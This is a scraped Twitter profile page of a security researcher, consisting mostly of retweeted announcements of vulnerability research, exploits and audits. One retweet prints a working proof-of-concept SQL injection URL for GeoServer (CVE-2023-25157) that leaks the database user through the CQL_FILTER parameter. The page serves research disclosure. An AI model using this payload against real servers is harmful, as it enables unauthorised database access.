Vincent Ulitzsch

29 posts

Vincent Ulitzsch

Vincent Ulitzsch

@vinulium

Research Assistant @tuberlin

Berlin, Germany Katılım Haziran 2018
245 Takip Edilen162 Takipçiler
Vincent Ulitzsch retweetledi
Joseph Ravichandran
Joseph Ravichandran@0xjprx·
CVE-2025-24118 is an absolutely crazy race condition I found in the macOS / XNU kernel. Safe memory reclamation, read-only objects, memcpy implementation details, and a race condition- oh my! jprx.io/cve-2025-24118
English
5
81
338
56K
Vincent Ulitzsch retweetledi
dmnk.bsky.social
dmnk.bsky.social@domenuk·
You think Rust is great but you can't use it for your embedded device? Ivan and me wrote a blog post about gradually introducing it into existing C firmware 🦀🦀🦀 security.googleblog.com/2024/09/deploy…
English
2
28
107
11K
Vincent Ulitzsch retweetledi
@modzero@infosec.exchange
Unfortunately this is necessary: 8532a9e0e49991ffdc3bfe7b728513e254e288a86275c6473e3b42228641e5fa MZ-24-01_8641e5fa.pdf (and please find us on mastodon as well: @modzero" target="_blank" rel="nofollow noopener">infosec.exchange/@modzero)
English
1
1
3
977
Vincent Ulitzsch retweetledi
parzel
parzel@parzel2·
Today we release the proof-of-concept exploits for the vulnerabilities we identified in HP #Poly VoIP devices. At the #37C3 we presented how these issues allow an attacker with network access to gain RCE and transform your devices into wiretaps. github.com/modzero/MZ-23-…
English
0
2
4
932
Vincent Ulitzsch retweetledi
parzel
parzel@parzel2·
Proof of Concept for #CVE-2023-25157 /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true
English
8
95
344
51.5K
Vincent Ulitzsch retweetledi
Joseph Ravichandran
Joseph Ravichandran@0xjprx·
The world's first(?) kernel exploit for Vision Pro- on launch day!
Joseph Ravichandran tweet mediaJoseph Ravichandran tweet media
English
82
767
6.6K
1.8M
Vincent Ulitzsch retweetledi
parzel
parzel@parzel2·
I merged together a few offensive golang projects to create a go / cgo bof runner that you can use in your implants. Not field-tested though :) #redteam github.com/parzel/GoBofRu…
English
0
2
4
407
Vincent Ulitzsch retweetledi
Christian Werling
Christian Werling@_cwerling·
Disk encryption is critical in securing your data when you lose your device or an attacker gets physical access. But we found that if you don't use a BitLocker passphrase on an AMD system (before Windows even comes up), your data is not adequately secured: arxiv.org/abs/2304.14717
English
4
66
146
33K
Vincent Ulitzsch retweetledi
@modzero@infosec.exchange
@[email protected]@mod0·
Better make sure your password manager is secure -- or someone else will. We found critical security issues in the enterprise password manager Passwordstate that allowed to access passwords and gain a shell -- without any authentication #CVE-2022-3875 modzero.com/modlog/archive…
English
1
26
40
12.7K
Vincent Ulitzsch retweetledi
Security Research Labs
Security Research Labs@SecReLabs·
In over a dozen audits we gained extensive experience in auditing #Substrate-based blockchain projects. This blog post describes our methodology that helped to identify many critical vulnerabilities. srlabs.de/bites/blockcha…
Security Research Labs tweet media
English
0
6
9
0